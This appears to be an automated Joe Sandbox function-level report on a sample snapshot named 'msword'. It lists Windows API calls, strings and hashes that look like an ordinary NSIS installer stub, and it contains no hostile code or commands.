Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Section: "%s", xrefs: 004050A5
Skipping section: "%s", xrefs: 004050E1

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
